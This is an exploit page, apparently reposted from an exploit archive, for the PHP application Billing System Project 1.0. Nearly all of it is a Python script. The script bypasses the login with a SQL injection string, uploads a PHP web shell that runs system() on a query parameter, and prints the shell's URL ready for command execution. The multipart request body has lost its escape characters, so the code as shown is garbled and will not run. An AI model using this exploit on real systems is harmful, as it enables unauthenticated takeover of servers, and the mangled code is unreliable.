Authored by Talha Demirsoy

Billing System Project version 1.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 06.07.2021
# Exploit Author: Talha DEMÄ°RSOY
# Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html
# Version: V 1.0
# Tested on: Linux & Windows

import requests
import random
import string
from bs4 import BeautifulSoup

let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))
randstr = ''.join(random.choice(let) for i in range(15))

payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd =
($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"

url = input("Target : ")

session = requests.session()

reqUrl = url + "login.php"
reqHead = {"Content-Type": "application/x-www-form-urlencoded"}
reqData = {"username": "admin' or '1'='1'#", "password": "-", "login": ''}
session.post(reqUrl, headers=reqHead, data=reqData)

print("Shell Uploading...")

reqUrl = url + "php_action/createProduct.php"
reqHead = {"Content-Type": "multipart/form-data;
boundary=----WebKitFormBoundaryOGdnGszwuETwo6WB"}
reqData =
"rnrn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="currnt_date"rnrnrn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data; name="productImage";
filename=""+shellname+".php"rnContent-Type:
application/octet-streamrnrn"+payload+"rnrn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="productName"rnrn"+randstr+"_TalhaDemirsoyrn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="quantity"rnrn1rn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="rate"rnrn1rn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="brandName"rnrn1rn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="categoryName"rnrn2rn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="productStatus"rnrn1rn------WebKitFormBoundaryOGdnGszwuETwo6WBrnContent-Disposition:
form-data;
name="create"rnrnrn------WebKitFormBoundaryOGdnGszwuETwo6WB--rn"
session.post(reqUrl, headers=reqHead, data=reqData)

print("product name is "+randstr)
print("shell name is "+shellname)

reqUrl = url + "product.php"
data = session.get(reqUrl)

parser = BeautifulSoup(data.text, 'html.parser')
find_shell = parser.find_all('img')

for i in find_shell:
    if shellname in i.get("src"):
        print("Shell URL : " + url  + i.get("src") + "?cmd=whoami")

RELATED ARTICLESMORE FROM AUTHOR